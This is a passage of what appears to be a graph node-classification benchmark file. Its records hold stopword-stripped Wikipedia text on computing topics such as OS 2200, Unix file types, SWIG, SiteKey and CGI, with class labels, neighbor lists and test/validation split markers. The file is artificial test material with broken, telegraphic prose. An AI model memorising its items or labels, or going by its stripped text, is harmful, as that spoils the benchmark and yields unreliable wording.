multiple copies running concurrently written code could shared required loading one copy memory saving space time took load code another reason separate code data different load entities memory implemented two independent banks separate physical cabinets called ibank dbank instruction data access path cpu could read banks simultaneously loading executable code one memory bank data run time many programs could almost halved reentrant code thread safe execute self-modifying code allowed programs modifying executable code runtime still acceptable programming technique time 1100-series computers users encouraged performance hit security benefits touted highly valued hacking 1100-series applications would provide benefit anyone hackers malevolent exec 8 primarily batch processing system gave applications called tasks fine control cpu scheduling priority threads called activities processor switching preemptive higher priority threads gaining control processor currently running lowest priority thread program except realtime systems even lowest priority tasks got processor time multiprogramming multiprocessing operating system fully symmetric processor management test-and-set instruction built hardware allowed efficient fine-grained locking within os within multi-threaded applications exec 8 work organized jobs called runs scheduled based priority need lockable resources uniservo tape drives fastrand drum files control language syntax uses symbol univac called master space control statement recognition symbol immediately followed command program name comma option switches space character remainder statement differed particular commands command compile fortran program would look like options sourcefile objectfile input data application could read file generally card images immediately follow command run stream lines sentinel command end assumed input data forgetting insert led compiler interpreting subsequent commands program data reason preferable process data files rather inputting run stream 1968 work began adding time-sharing capability exec 8 delivered level 23 executive 1969 time sharing called demand mode capabilities batch real time processes everything could done batch could done ascii terminal demand mode job stream i/o attached terminal handler rather card image input spool output files run control language used years later specific time sharing commands added control statements could issued asynchronously immediate processing even neither executive running program expecting data commands could entered terminal began could performed without stopping work progress terminal called transparent commands first statements kill current program redirect terminal output file eventually almost control statements allowed immediate batch demand runs terminate fin statement demand user terminates session run active exec automatically terminates run without requiring fin transaction processing capability developed late 1960s joint project united airlines later refined another joint project air canada capability fully integrated operating system 1972 became basis much future growth 1100 series early users controlled communication lines directly within real time programs part development transaction processing included communication message system managed communication lines presented messages exec 8 scheduled transactions moved low level communication physical line management protocols applications cms 1100 application cms 1100 ran real time multi-threaded program privilege acquiring control communication lines submitting transaction messages scheduling led notions exec 8 applications nature needed carefully controlled ensure could cause integrity issues security certainly concern early days system reliability integrity much larger issues system still primarily batch transaction processing little chance anyone could install unauthorized code system cms 1100 later added capability interface demand terminals well transaction terminals terminals could used early terminal drivers could removed exec cms 1100 later replaced combination cpcomm clearpath enterprise servers communications platform silas system interface legacy application systems intel-based dorado server models lower level communications moved firmware upper levels handled silas cpcommos clearpath enterprise servers communications platform open systems exec contains code system allowed run highest privilege levels mechanisms code promoted privilege levels exec responsible managing system hardware scheduling managing work communicating operators administrators release 16.0 exec level 49r2 49.70.5 internal system levels use three-part number 21.92.42 first widely used production system although earlier releases used production number sites first number part major level indicates new version exec previous updates integrated new base version infrequent process occurs intervals years second number part indicates versions updates major level often occurs several times per week decision made freeze feature content prepare release third part comes play indicates versions pre-release level fixes minor feature updates applied concurrently preparing level release updates mainline continue engineers integrate changes preparation future release many years official release level full three-part number later releases named simply 44r1 44r2 49r2 although three-part number still used internally exec heart real time multi-threaded batch processing system everything built around model exec largely structured real time program functions performed services windows daemons linux unix implemented either activities within exec batch programs always running background time-sharing known demand mode transaction processing implemented special cases batch one result restrictions time-sharing user transaction program lots warnings writers transaction programs happy performance example call tape mount permitted largest unit work run taken factory production run terminology generally equates job session systems run defined run stream run stream sequence control statements represent steps taken may include file handling program execution branches control batch run typically stored file scheduled start command within another run operator time sharing run initiated logging time-sharing terminal inputting run command often run statement second control statement often add program execution generated automatically based user profile security authorizations validated based authenticated user-id information supplied run control statement transactions special case ’ actually control statements internal data structures run created enables exec associate security accounting debugging etc mechanisms transaction programs generally security profile cached memory time transaction user authenticated copied user session data transaction run state transaction scheduled transaction instance essentially run accounting logging error handling encapsulated run mechanism batch jobs runs characterized runstream job control language statements stored file batch job always contains run statement first record file statement gives run name runid defines priorities defines maximum number sups standard units processing job expected use job started job start control statement operator via st keyin system may configured automatically issue start statements number jobs boots jobs serve purpose performing initialization recovery background functions fields run statement may overridden corresponding fields start statement except start executed privileged user userid security state always taken run start two priority fields run statement one used specify backlog priority 26 backlog priority levels – z exec configured maximum number open batch runs level reached jobs selected backlog queues priority order within priority selection usually fifo however exec pre-scans job control statements first program execution looking file names reel numbers job would immediately stall resources needs available may bypassed start jobs priority level second priority level defines execution processor resource group general higher execution group priorities typically get processor time os 2200 job control language support full programmability allow dynamic additions sequences control language add control statement file added may created job immediately preceding adding add control statements may also submitted within running program via api additional programmability available indirectly use symbolic stream generator ssg ssg programming language manipulating creating text files input parameters system information used heavily configuration management make processing functions text images need created programmatically resulting output add ed run thus providing indirectly programmable runstream operator commands available change backlog execution priorities runs operator commands available api suitably privileged users automated controlled remote administrator deadline special case batch deadline run looks like batch run except deadline time specified run start control statement deadline time used conjunction maximum sups time estimate control statement deadline job runs normal batch priorities unless appears could miss deadline time mismatch time deadline remaining sups higher priority deadline ’ totally shut transactions effect real time effectively shut processing system necessary achieve goal os 2200 time-sharing sessions called demand demand runs use control language batch runs additions known immediate control statements immediate control statements use sentinel indicates executed immediately even program running used create assign files important ones allow demand user error terminate running program even send signal transactions execute runs without stored submitted control statements instead message received session defined transaction session scanned determine transaction queue placed normally determined first characters message user-written scanners may added communication manager capable handling 250,000 active sessions takes incoming transaction messages passes message queuing software handle unlimited number queued messages using message queuing architecture call made transaction interface package tip apis operating system queue transaction appropriate queuing point queuing point identifies priority concurrency level work associated transaction program executed transaction program scheduling tree allows client establish relative usage groups transaction programs concurrency limits avoid one type work dominating system exclusion work avoid creating commitment resources 4094 nodes may created tree priority 0 63 concurrency level 1 2047 specified transaction program highest priority transaction selected scheduling except limited concurrency policies effect node higher nodes real time another type run rather set priority levels activity may request real time typically used long running batch programs like os 2200 communications manager cpcomm restricted 36 real time priority levels available api applications use user account must privilege use real time priorities site control applications use priority levels real time priorities totally dominate lower priorities quite possible misbehaved real time program tie one processors real time priority applies individual activity thread program may real time non-real time threads executing time run started getting access processor controls rate progress heart exec dispatcher manages processors exec supports 4095 dispatching priorities although sites define small subset two highest priorities ’ switchable recognition certain types processing must allowed continue processor started voluntarily give control interrupt lockout occurs interrupt arrives special cases exec code prevents interrupts order change data interrupt handler may also access interlock used interrupt post processing routines either need run physical processor simply interrupted dispatcher i/o completions i/o initiation examples locks used priorities spin locks way set someone else another processor design requires set short instruction sequences high exec priority used operator command handler functions may run even real time program control expected use short amounts time need time queue work processed low exec activity real time activities unlimited processor quantum run without switching unless interrupted higher priority real time activity high exec activity real time activities given control available processor running something lower priority interrupts sent processors necessary ensure immediate availability real time used customers fly missiles run simulators functions require immediate response transaction priorities may handled two ways defined site may sort lower priority real time priority matters quantum size essentially infinite appropriate short-lived transactions airline reservations one loops due programming error exec terminate reaches small configured maximum time form allows exec vary priority within range optimize system resource usage approach gives higher priority shorter time slices programs i/o limited progressively lower priorities longer time slices computing exec dynamically adjusts priorities based behavior programs often behave ways different times approach appropriate longer running transactions like database queries airline fare quotes batch demand always use dynamically adjusted priorities programs i/o limited conversation time-sharing user get higher priorities short time slices compute-oriented programs get lower priorities longer time slices exec two additional mechanisms optimizing dispatching one affinity-based dispatching possible exec run activity processor last time get greatest advantage residual cache contents n't possible tries keep activity nearest processor standpoint cache memory access times second fairness policy mechanism site define relative percentage resources allocated transactions demand batch within transactions batch priority groupings indicate percentage group time allocated priority ensures transactions dominate system batch work gets done within various priority groupings ensures progress assured group unless group percentage zero fairness algorithms come play processors busy os 2200 systems often run processors near 100 utilized os 2200 supports several models system performance management customers may purchase certain fixed performance level exec monitor processor usage ensure performance exceed level customers also purchase additional performance either temporarily permanently full capacity system workload increases emergency requires recently system added metered usage capability mode full power system always available customer although may administratively limit usage accumulated month reported usage submitted unisys billing depending specific contract terms client may receive bill excess usage contracted baseline month statement showing total contracted usage decremented first form like cell phone bill potential charging excess minutes latter like buying pre-paid phone card os 2200 hierarchical file system operating systems rather structured naming convention notion container files called program files files os 2200 simply containers may addressed either word offset file sector 28-word unit offset file 28 words historical unit early mass storage device fastrand drum could hold 64 units per physical track nonetheless fortunate historical accident four 28-word units 112 words occupy 504 bytes today mass storage devices using 512-byte physical records os 2200 clients almost adopted multiple 112 words physical record size database page size i/o processors automatically adjust 504 512 byte mapping adding 8 bytes zeros writes stripping reads physical record os 2200 handles applications use sizes multiples 112 words indivisibly reading containing physical records writing back unchanged changed portions data chaining special locking functions guarantee indivisibility even device errors across multiple systems cluster file formats internal data structures described data structures programming reference manual ever since exec-8 file names taken form qualifier*filename f-cycle e.g. personnel*employees +1 qualifier filename simply twelve-character strings used create whatever naming structure client desires f-cycle number 0 999 allows multiple generations file may referenced relative numbers +1 next new cycle -1 previous cycle +0 current cycle leaving cycle defaults current cycle batch production runs create new generations files use approach numbers wrap around 999 32 consecutive relative cycle numbers may exist one time creating +1 deletes -31 file may used program file program file contains elements generally act files element naming qualifier*filename f-cycle .element/version e-cycle e.g. personnel*programs.taxcalc/2008 element version twelve-character names used way user desires e-cycle similar f-cycle represents generation number without restriction 32 concurrent cycles limit 256k cycles however e-cycle applies text elements line text element marked cycle numbers inserted deleted elements also type sub-type commonly used types text object default type suitable options select appropriate type text elements also sub-types typically represent programming language e.g. asm c cob default element name object file text file created object element may executed main program linked object elements including main program linking may static dynamic main program may executed without pre-linking provided required sub-programs program file system libraries otherwise known rules may included program file direct dynamic linker search unfulfilled references linker may also used statically link multiple object modules together form new object module containing instructions data information original object modules omnibus elements may used data applications may serve hold structured information applications system utilities assumed structure omnibus element compatibility earlier basic mode programming models relocatable absolute element types relocatable elements output basic mode compilers may combined basic mode static linker map – collector form absolute element executable os 2200 implements fully virtual file system files may allocated anywhere across mass storage devices mass storage treated large space pool similar way virtual memory managed contiguous space allocated possible mass storage treated set pages 8kb size file placed many areas different devices required dynamic expansion files attempts allocate space adjacent previous allocation find space wherever available fact files need even present mass storage used exec file backup system fully integrated file backups made tape reel number recorded file directory space gets short mass storage files simply marked unloaded current backup copy space available use enough space ca n't found way backup started reference unloaded file queued file copied back mass storage whole system automatic generally transparent users general exec provide access methods files simply containers access methods provided language run time systems database manager one exception fixed-block access method provided high-volume transaction processing much less overhead database manager participate locking clustering recovery mechanisms clients want explicit control location files use removable pack concept one time truly represented physically removable disk packs operating system would automatically generate pack mount requests operators needed today still used place files usually database files transaction files one disk volumes files may still span multiple disk volumes list volume names given file created files volume groups still backed subject automatic virtual space management os 2200 also provides full implementation common internet file system cifs cifs implements smb protocol used microsoft servers unix/linux samba software cifs clearpath os 2200 file server file client cifs-compliant systems includes desktop pcs running windows cifs supports smb message signing maintain os 2200 security cifs clearpath os 2200 provides two levels protection first os 2200 files visible network declared shares cifs command specific privilege exists control may declare share second level control access still protected os 2200 security clients accessing os 2200 via cifs either automatically identified via ntlm kerberos presented query os 2200 user id password cifs allows os 2200 files presented hierarchical view typically qualifier appear highest level tree followed filename element name version addition files may stored os 2200 servers using full windows filename format windows applications see os 2200 another file server os 2200 applications apis available read write files existing cifs-compliant servers windows file servers network text files automatically converted os 2200 internal formats binary files must understood application program cifsut utility running os 2200 exchange encrypted compressed files software winzip concept subsystems protected subsystems central design os 2200 subsystem analogous .dll windows code data may shared among programs running system os 2200 subsystem set banks reside separate part address space directly accessed user program instead hardware os provide gate may target call instruction see unisys 2200 series system architecture information database managers run time libraries messaging system many system functions implemented subsystems subsystems usually consisting pure code run time libraries may direct target call instruction without requiring gate subsystems run user program protection environment subsystems database managers consist code data privileged code may called via gate subsystems may also access control lists associated control may call importantly gate controls specific entry points visible protection environment subsystem run often user-specific parameter provides additional secure information caller os 2200 security system designed protect data unauthorized access modification exposure includes implementation dod orange book b1 level specification os 2200 first obtained successful b1 evaluation september 1989 evaluation maintained 1994 point os 2200 developers continued follow development documentation practices required b1 evaluation central b1 system concepts users objects users identities clearance levels compartments privileges objects require certain combinations various types access objects os 2200 consist files protected subsystems devices tape reels security profile user session includes user identity clearance level 0-63 compartment set set allowed privileges os 2200 implements mandatory access control mac discretionary access control dac based bell-la padula model confidentiality read write biba integrity model read write run read execute file run executing clearance level must greater equal clearance level file file clearance level must 0 within clearance level range run addition run executing compartment set must contain file compartment set os 2200 combines bell-la padula biba model requirements run executing clearance level compartment set must exactly match file permit writing file deleting dac associates access control list object list identifies users user groups access defines type access user group allowed read write execute delete full set b1 controls restrictive environments system administrators configure servers choosing controls apply set security levels fundamental security security level 3 serves starting point every os 2200 system one user designated security officer systems configured fundamental security security officer allowed perform certain tasks systems configured higher levels security trusted users may allowed perform tasks os 2200 provides fine-grained security mechanism based principle least privilege principle demands minimum privilege granted necessary perform task required thus os 2200 concept super user role assumed user rather uses large set specific privileges may granted separately user privilege associated specific authority systems configured security level 1 higher levels user creates object object owner default object private creating user may also public controlled access control list owner security officer may create access control list object system configured fundamental security files owners instead created private account project public access controlled read write keys users log system identify optionally select clearance level compartment set use session os 2200 offers flexible authentication system multiple authentication mechanisms supported concurrently client- third party-written authentication software may also used standard authentication capabilities include last two permit use biometrics smart cards authentication mechanism supported technologies os 2200 provides encryption data rest cipher api software subsystem encrypts decrypts caller data cipher api also supports use hardware accelerator card bulk data encryption cmos-based dorado servers cpcomm provides ssl/tls encryption data transit intel-based dorado servers ssl tls provided openssl included dorado firmware dorado servers support tls levels 1.0 1.2 well sslv3 ssl disabled default vulnerabilities protocol cpcomm cipher api use encryption services cryptolib fips-certified software encryption module aes triple des algorithms among algorithms implemented cryptolib os 2200 also supports encrypting tape drives provide encryption archive data os 2200 systems may clustered achieve greater performance availability single system 4 systems may combined cluster sharing databases files via shared disks hardware device xpc-l provides coordination among systems providing high-speed lock manager database file access clustered environment allows system local files databases application groups along shared files one shared application groups local files databases accessed single system shared files databases must disks simultaneously accessible systems cluster xpc-l provides communication path among systems coordination actions also provides fast lock engine connection xpc-l via special i/o processor operates extremely low latencies lock manager xpc-l provides functions required file database locks includes deadlock detection ability free locks failed applications xpc-l implemented two physical servers create fully redundant configuration maintenance including loading new versions xpc-l firmware may performed one servers continues run failures including physical damage one server stop cluster information kept servers os 2200 operations built around active operators one consoles console terminal window part reserved fixed display frequently updated summary information activity system rest console used scrolling display events message issued requires operator response given number 0 9 remains display answered tape mount messages scroll messages repeated every two minutes tape mounted operations sentinel used os 2200 operations os 2200 consoles simply windows within operations sentinel display may many display pcs desired remote operation typical operations sentinel supports number clearpath windows linux unix systems auto-action message database released product database allows operations sentinel recognize messages scripts may written automatically respond messages require response hide unwanted messages translate languages create events etc full dark room operation used clients operations sentinel displays remote locations monitoring system creating alerts certain events occur administration os 2200 systems performed using wide variety tools specialized particular area system example tool used administering transaction environment allows new transaction programs installed specifies necessary information changes queuing structure priorities concurrency levels tools specific security officer allow creation users changing allowed privileges changing system security settings etc tools graphical interface although provide batch stored file interface actions specified control stream allows scripting administrative interfaces either local sites maybe based time day events remote sites unique privileges required administrative area application groups logical construct consisting instance universal data system uds instance message queue subsystem set transactions application group audit trail os 2200 supports maximum 16 application groups system notion application group corresponds often called application set programs data represent larger unit connected processing example application group might represent airline system another application group might represent corporate finance system application groups might represent instances application data models bank branches important thing application group environment sessions recovery etc application groups may started stopped recovered independently application groups accounting scheduling rules transactions multiple application groups may share priorities interleaved priorities permits site control relative priorities transactions across entire system unisys history newsletter contains articles unisys history computers addition unisys history newsletters links sites historical archives unisys charles babbage institute university minnesota hagley museum library delaware charles babbage institute holds archives era early remington rand archives saint paul mn burroughs archives hagley museum library holds bulk sperry archives",
    "neighbors": [
      2432,
      6529,
      2179,
      3716,
      6797,
      5658,
      9762,
      1702,
      11432,
      4398,
      7983,
      11184,
      11059,
      7483,
      8001,
      11075,
      8136,
      5067,
      1869,
      2002,
      5714,
      6098,
      10580,
      10835,
      4067,
      2533,
      8556,
      5363
    ],
    "mask": "Test"
  },
  {
    "node_id": 2478,
    "label": 8,
    "text": "MacHTTP:machttp machttp webserver designed run classic mac os versions 7.x 9.x written software developer chuck shotton originally shareware dates 1993 available source code form sourceforge.net perl artistic license current version 2.6.1 still used older macintosh hardware later commercialized webstar sold originally starnine later bought quarterdeck software program runs mac os x classic environment ported run natively mac os x though attempt apparently underway 2003 functionally replaced apache web server machttp supports common gateway interface standard generating dynamic content well apple events scriptability",
    "neighbors": [
      576,
      2485,
      670
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2479,
    "label": 6,
    "text": "Unix_file_types:unix file types standard unix file types regular directory symbolic link fifo special block special character special socket defined posix different os-specific implementations allow types posix requires e.g solaris doors file type identified codice_1 command displays type first character file system permissions field regular files unix impose provide internal file structure therefore structure interpretation entirely dependent software using however codice_2 command used determine type data contain take example one line codice_1 output posix specifies format output long format codice_4 option particular first field first space dubbed file mode string first character describes file type rest string indicates file permissions therefore example mode string codice_5 file type codice_6 directory permissions codice_7 internally codice_8 obtains codice_9 structure associated file transforms codice_10 field human-readable format note codice_10 actually bit field two parts file type stored within codice_12 mask tested macros like codice_13 codice_14 value mask codice_12 get file type flags gnu coreutils version codice_8 uses call codice_17 glibc function exposed gnulib library get mode string freebsd uses simpler approach allows smaller number file types regular files show codice_1 hyphen-minus codice_19 mode field common special file directory layout directory file defined filesystem used several filesystems available unix native non-native one directory file layout directory marked codice_6 first letter mode field output codice_21 codice_9 e.g symbolic link reference another file special file stored textual representation referenced file path means destination may relative path may exist symbolic link marked codice_23 lower case codice_24 first letter mode string e.g one strengths unix always inter-process communication among facilities provided os pipes connect output one process input another fine processes exist parent process space started user circumstances communicating processes must use fifos referred named pipes one circumstance occurs processes must executed different user names permissions named pipes special files exist anywhere file system created command codice_25 codice_26 named pipe marked codice_27 first letter mode string e.g socket special file used inter-process communication enables communication two processes addition sending data processes send file descriptors across unix domain socket connection using codice_28 codice_29 system calls unlike named pipes allow unidirectional data flow sockets fully duplex-capable socket marked codice_30 first letter mode string e.g unix almost things handled files location file system even hardware devices like hard drives great exception network devices turn file system handled separately device files used apply access rights devices direct operations files appropriate device drivers unix makes distinction character devices block devices distinction roughly follows although example disk partitions may character devices provide un-buffered random access blocks partition block devices provide buffered random access blocks partition character device marked codice_31 first letter mode string likewise block device marked codice_32 e.g door special file inter-process communication client server currently implemented solaris door marked codice_33 upper case first letter mode string e.g",
    "neighbors": [
      2432,
      3522,
      5698,
      1509,
      4423,
      7975,
      5969,
      5492,
      10774,
      8631,
      6813
    ],
    "mask": "Test"
  },
  {
    "node_id": 2480,
    "label": 3,
    "text": "Zero_instruction_set_computer:zero instruction set computer computer science zero instruction set computer zisc refers computer architecture based solely pattern matching absence micro- instructions classical sense chips known thought comparable neural networks marketed number synapses neurons acronym zisc alludes reduced instruction set computer risc zisc hardware implementation kohonen networks artificial neural networks allowing massively parallel processing simple data 0 1 hardware implementation invented guy paillet developed cooperation ibm chip factory essonnes france commercialized ibm zisc architecture alleviates memory bottleneck blending pattern memory pattern learning recognition logic massively parallel computing solves allotting neuron memory allowing simultaneous problem-solving results settled disputing according techcrunch software emulations types chips currently used image recognition many large tech companies facebook google applied miscellaneous pattern detection tasks text results said produced microseconds even chips released 2007 junko yoshida ee times compared neuromem chip machine machine capable able predict crimes scanning people faces person interest tv series describing heart big data foreshadow ing real-life escalation era massive data collection",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      3142,
      2638,
      1122,
      3175,
      8815,
      630,
      8822,
      6268,
      3197,
      7313,
      6815,
      8352,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      2241,
      2243,
      9932,
      5329,
      10966,
      731,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      8944,
      757,
      2805,
      10485,
      249,
      8700,
      1798,
      1801,
      6926,
      6415,
      1298,
      11539,
      2339,
      6950,
      3886,
      309,
      8501,
      5948,
      4928,
      8514,
      4423,
      6476,
      7505,
      9044,
      11604,
      344,
      8543,
      1376,
      10603,
      4465,
      10612,
      1399,
      7033,
      1402,
      3457,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      10675,
      1461,
      1463,
      7607,
      4030,
      453,
      3014,
      466,
      1499,
      1502,
      7134,
      5090,
      995,
      7653,
      9707,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 2481,
    "label": 9,
    "text": "SWIG:swig simplified wrapper interface generator swig open-source software tool used connect computer programs libraries written c c++ scripting languages lua perl php python r ruby tcl languages like c java javascript go modula-3 ocaml octave scilab scheme output also form xml lisp s-expressions aim allow calling native functions written c c++ programming languages passing complex data types functions keeping memory inappropriately freed inheriting object classes across languages etc programmer writes interface file containing list c/c++ functions made visible interpreter swig compile interface file generate code regular c/c++ target programming language swig generate conversion code functions simple arguments conversion code complex types arguments must written programmer swig tool creates source code provides glue c/c++ target language depending language glue comes two forms swig used calling interpreted functions native code must done programmer manually swig wraps simple c declarations creating interface closely matches way declarations would used c program example consider following interface file file two functions global variable two constants swig creates extension module declarations accessible scripting language functions variables constants respectively python two main reasons embed scripting engine existing c/c++ program several reasons create dynamic libraries loaded extant interpreters including swig written c c++ publicly available since february 1996 initial author main developer david m. beazley developed swig working graduate student los alamos national laboratory university utah faculty university chicago development currently supported active group volunteers led william fulton swig released gnu general public license swig successful participant google summer code 2008 2009 2012 2008 swig got four slots haoyu bai spent summers swig python 3.0 backend jan jezabek worked support generating com wrappers cheryl foil spent time comment 'translator swig maciej drwal worked c backend 2009 swig participated google summer code time four students participated baozeng ding worked scilab module matevz jekovec spent time c++0x features ashish sharma spent summer objective-c module miklos vajna spent time php directors 2012 swig participated google summer code time four five students successfully completed project leif middelschulte worked c target language module swati sharma enhanced objective-c module neha narang added new module javascript dmitry kabak worked source code documentation doxygen comments python similar functionality offered sip boost boost.python library",
    "neighbors": [
      5634,
      3462,
      8582,
      11661,
      8079,
      1435,
      9245,
      4777,
      5677,
      2045,
      692,
      9780,
      1724,
      9921,
      8644,
      5703,
      5833,
      8396,
      479,
      10083,
      10470,
      8554,
      2804,
      4341,
      1401,
      7805,
      8702
    ],
    "mask": "None"
  },
  {
    "node_id": 2482,
    "label": 9,
    "text": "Kristen_Nygaard:kristen nygaard kristen nygaard 27 august 1926 – 10 august 2002 norwegian computer scientist programming language pioneer politician internationally nygaard acknowledged co-inventor object-oriented programming programming language simula ole-johan dahl 1960s nygaard dahl received 2001 a. m. turing award contribution computer science nygaard born oslo received master degree mathematics university oslo 1956 thesis abstract probability theory entitled theoretical aspects monte carlo methods nygaard worked full-time norwegian defense research establishment 1948 1960 computing programming 1948–1954 operational research 1952–1960 1957 1960 head first operations research groups norwegian defense establishment cofounder first chairman norwegian operational research society 1959–1964 1960 hired norwegian computing center ncc responsible building ncc research institute 1960s becoming director research 1962 together ole-johan dahl developed simula 1961–1965 simula-67 first object-oriented programming languages introducing core concepts object-oriented programming languages objects classes inheritance virtual quantities multi-threaded quasi-parallel program execution 2004 aito established annual prize name ole-johan dahl kristen nygaard honor pioneering work object-orientation aito dahl-nygaard prize awarded annually two individuals made significant technical contributions field object-orientation work spirit pioneer conceptual and/or implementation work dahl nygaard shaped present view object-oriented programming prize presented year ecoop conference prize consists two awards given senior junior professional conducted research norwegian trade unions planning control data processing evaluated light objectives organised labour 1971–1973 working together olav terje bergo research development work included social impact computer technology general system description language delta 1973–1975 working erik holbaek-hanssen petter haandlykken nygaard professor aarhus denmark 1975–1976 became professor emeritus oslo part-time 1977 full-time 1984–1996 work aarhus oslo included research education system development social impact computer technology became foundation scandinavian school system development closely linked field participatory design beginning 1976 engaged development since 1986 implementation general object-oriented programming language beta together bent bruun kristensen ole lehrmann madsen birger moeller-pedersen language available wide range computers nygaard first half 1980s chairman steering committee scandinavian research program sydpol system development profession oriented languages coordinating research supporting working groups system development language research artificial intelligence also 1980s chairman steering committee cost-13 european common market commission -financed research project extensions profession-oriented languages necessary artificial intelligence information technology becoming part professional work nygaard research 1995-1999 related distributed systems leader general object-oriented distributed systems goods three-year norwegian research council-supported project starting 1997 aiming enriching object-oriented languages system development methods new basic concepts make possible describe relation layered and/or distributed programs computer hardware people carrying programs goods team also included haakon bryhni dag sjøberg ole smørdal nygaard final research interests studies introductory teaching programming creation process-oriented conceptual platform informatics subjects developed new research project called cool comprehensive object-oriented learning together number international test sites giving lectures courses subjects norway elsewhere november 1999 became chair advisory committee broadband communication norwegian department municipal regional affairs held part-time position simula research laboratory 2001 research institute opened june 1990 received honorary doctorate lund university sweden june 1991 became first individual given honorary doctorate aalborg university denmark became member norwegian academy sciences october 1990 computer professionals social responsibility awarded norbert wiener award social professional responsibility 1999 became together dahl first receive rosing prize new prize awarded norwegian data association exceptional professional achievements june 2000 awarded honorary fellowship originating object technology concepts object management group international organization standardization within object-orientation november 2001 dahl awarded ieee john von neumann medal institute electrical electronics engineers introduction concepts underlying object-oriented programming design implementation simula 67 february 2002 given together ole-johan dahl 2001 a. m. turing award association computing machinery acm citation ideas fundamental emergence object oriented programming design programming languages simula simula 67 august 2000 made commander royal norwegian order st. olav king norway 1984 1985 nygaard chairman informatics committee university oslo active design university plan developing research education computing communication facilities faculties university first chairman environment protection committee norwegian association protection nature 10 years 1970s norwegian representative oecd activities information technology member research committee norwegian federation trade unions cooperated unions number countries several years engaged running experimental social institution trying new ways creating humane living conditions socially outcast alcoholics nygaard active norwegian politics mid late 1960s member national executive committee norwegian liberal party chair party strategy committee minor ballot candidate 1949 parliamentary election intense political fight 1972 referendum whether norway become member european common market later european union worked coordinator many youth organisations worked membership 1971 2001 nygaard member labour party member committees research policies party november 1988 became chair information committee norway eec august 1990 reorganized nei til ef organization disseminating information norway relation common market coordinating efforts keep norway outside european union membership norway literally eu 1993 eec ratified maastricht treaty became european union organization changed name reflect nei til ef became largest political organization norway 145,000 members 1994 population 4 million nygaard worked anne enger lahnstein leader anti-eu centre party campaign referendum november 28 1994 nei til eu succeeded 52.2 electorate voted voter participation highest ever norway history 88.8 strategy campaign insisted nygaard something well i.e scandinavian welfare state nygaard considered threatened maastricht agreement resigned chair 1995 later chair organization strategy committee member council 1996 1997 nygaard coordinator efforts establish european anti-maastricht movement team cooperative network national organizations opposing economic monetary union european union emu maastricht treaty european countries within outside eu team successfully started march 3 1997 kristen nygaard married johanna nygaard 1951 johanna nygaard worked norwegian agency aid developing countries specialized number years recruiting giving administrative support specialists working east africa johanna kristen nygaard three children seven grandchildren nygaard died heart attack 2002",
    "neighbors": [
      512,
      7048,
      11020,
      10668,
      1976,
      4799,
      4800,
      10049,
      4930,
      70,
      8262,
      10568,
      3529,
      5585,
      1883,
      7775,
      9315,
      4201,
      11242,
      2283,
      2798,
      8057,
      2556,
      511
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2483,
    "label": 8,
    "text": "SiteKey:sitekey sitekey web-based security system provides one type mutual authentication end-users websites primary purpose deter phishing sitekey deployed several large financial institutions 2006 including bank america vanguard group bank america vanguard group discontinued use 2015 product owned rsa data security 2006 acquired original maker passmark security sitekey uses following challenge-response technique user phishing site different web site domain legitimate domain user browser refuse send state token step 2 phishing site owner either need skip displaying correct security image prompt user security question obtained legitimate domain pass answers theory could cause user become suspicious since user might surprised re-prompted security questions even used legitimate domain browser recently however practice evidence users generally fail notice anomalies harvard study found sitekey 97 ineffective practice real people n't notice n't care sitekey missing according results also requires users keep track authentication information someone associated n different websites use sitekey must remember n different 4-tuples information site username phrase password may 2015 bank america announced sitekey would discontinued users end year would allow users log username password one step july 2015 vanguard also discontinued use sitekey website",
    "neighbors": [
      6064,
      1557
    ],
    "mask": "Test"
  },
  {
    "node_id": 2484,
    "label": 4,
    "text": "Anthony_Zboralski:anthony zboralski anthony zboralski french hacker artist internet entrepreneur anthony zboralski born martigues france attended parmiter school 1989 1990. 1994 zboralski social engineered fbi connect internet set teleconferences hackers period four months zboralski posed legal attaché paris thomas baker costing fbi 250,000 dollars zboralski part group hackers called w00w00 2011 2013 zboralski worked managing consultant ioactive 2014 zboralski co-founded belua systems limited surfez couvert tv show co-written antoine rivière zboralski zboralski offered practical recommendations protect life 2.0 began airing game one 2013 co-produced flair production mtv networks france",
    "neighbors": [
      8935,
      4212,
      4956
    ],
    "mask": "Test"
  },
  {
    "node_id": 2485,
    "label": 8,
    "text": "Common_Gateway_Interface:common gateway interface computing common gateway interface cgi offers standard protocol web servers execute programs execute like console applications also called command-line interface programs running server generates web pages dynamically programs known cgi scripts simply cgis specifics script executed server determined server common case cgi script executes time request made generates html brief http post request client send html form data cgi program via standard input data url paths http header data presented process environment variables 1993 national center supercomputing applications ncsa team wrote specification calling command line executables www-talk mailing list web server developers adopted standard web servers ever since work group chaired ken coar started november 1997 get ncsa definition cgi formally defined work resulted rfc 3875 specified cgi version 1.1 specifically mentioned rfc following contributors historically cgi scripts often written using c language rfc 3875 common gateway interface cgi partially defines cgi using c saying environment variables accessed c library routine getenv variable environ name cgi comes early days web users wanted connect databases web servers cgi program executed server provided common gateway web server database web server runs http server software responds requests web browsers generally http server directory folder designated document collection — files sent web browsers connected server example web server domain name codice_1 document collection stored codice_2 local file system web server respond request codice_3 sending browser pre-written file codice_4 pages constructed fly server software may defer requests separate programs relay results requesting client usually web browser displays page end user early days web programs usually small written scripting language hence known scripts programs usually require additional information specified request instance wikipedia implemented script one thing script would need know whether user logged logged name content top wikipedia page depends information http provides ways browsers pass information web server e.g part url server software must pass information script somehow conversely upon returning script must provide information required http response request http status request document content available document type e.g html pdf plain text et cetera initially different server software would use different ways exchange information scripts result n't possible write scripts would work unmodified different server software even though information exchanged therefore decided establish standard way exchanging information cgi common gateway interface defines common way server software interface scripts webpage generating programs invoked server software operate according cgi standard known cgi scripts standard quickly adopted still supported well-known server software apache iis extension node.js-based servers early use cgi scripts process forms beginning html html forms typically action attribute button designated submit button submit button pushed uri specified action attribute would sent server data form sent query string action specifies cgi script cgi script would executed produces html page web server allows owner configure urls shall handled cgi scripts usually done marking new directory within document collection containing cgi scripts — name often codice_5 example codice_6 could designated cgi directory web server web browser requests url points file within cgi directory e.g. 